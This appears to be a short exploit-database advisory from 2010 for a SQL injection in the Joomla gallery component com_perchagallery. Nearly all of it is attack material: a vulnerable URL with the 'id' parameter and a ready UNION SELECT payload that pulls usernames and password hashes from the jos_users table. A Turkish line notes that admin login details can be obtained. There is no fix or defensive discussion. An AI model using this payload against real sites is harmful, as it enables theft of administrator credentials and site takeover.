[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Joomla Component com_perchagallery SQL Injection Vulnerability
# Published : 2010-01-06
# Author : FL0RiX
# Previous Title : Erolife AjxGaleri VT Database Disclosure Vulnerability
# Next Title : AWCM Database Disclosure Vulnerability


########################################################################
# Joomla Component com_perchagallery SQL Injection Vulnerability

######################################################################## #
# Author :FL0RiX
#
# Name : com_perchagallery
#
# Bug Type : SQL Injection
#
# Infection : Admin login bilgileri alinabilir.
#
# Demo Vuln :
#
# http://localhost/index.php?option=com_perchagallery&view=editunidad&id=[EXPLOIT]
#
#EXPLOIT : null/**/union/**/select/**/1,concat(username,0x3a,password)fl0rix,3,4,5,6/**/from/**/jos_users--
########################################################################